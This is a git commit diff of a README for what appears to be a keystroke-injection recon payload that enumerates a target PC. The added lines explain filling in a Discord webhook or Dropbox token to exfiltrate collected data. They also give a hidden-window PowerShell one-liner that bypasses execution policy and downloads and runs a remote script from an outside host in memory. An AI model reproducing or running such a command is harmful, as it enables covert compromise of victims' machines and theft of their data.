Update README.md

This commit is contained in:
I-Am-Jakoby 2022-12-18 16:26:34 -06:00 committed by GitHub
parent 53da733043
commit 3f05350a29
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -55,6 +55,13 @@ This program enumerates a target PC to collect as much recon data as possible fo
* Plug in your device * Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
`$dc` is the variable that stores your discord webhook
`$db` is the variable that stores your dropbox token
Fill in either or both of these to methods to exfil your collected data
``` ```
powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
``` ```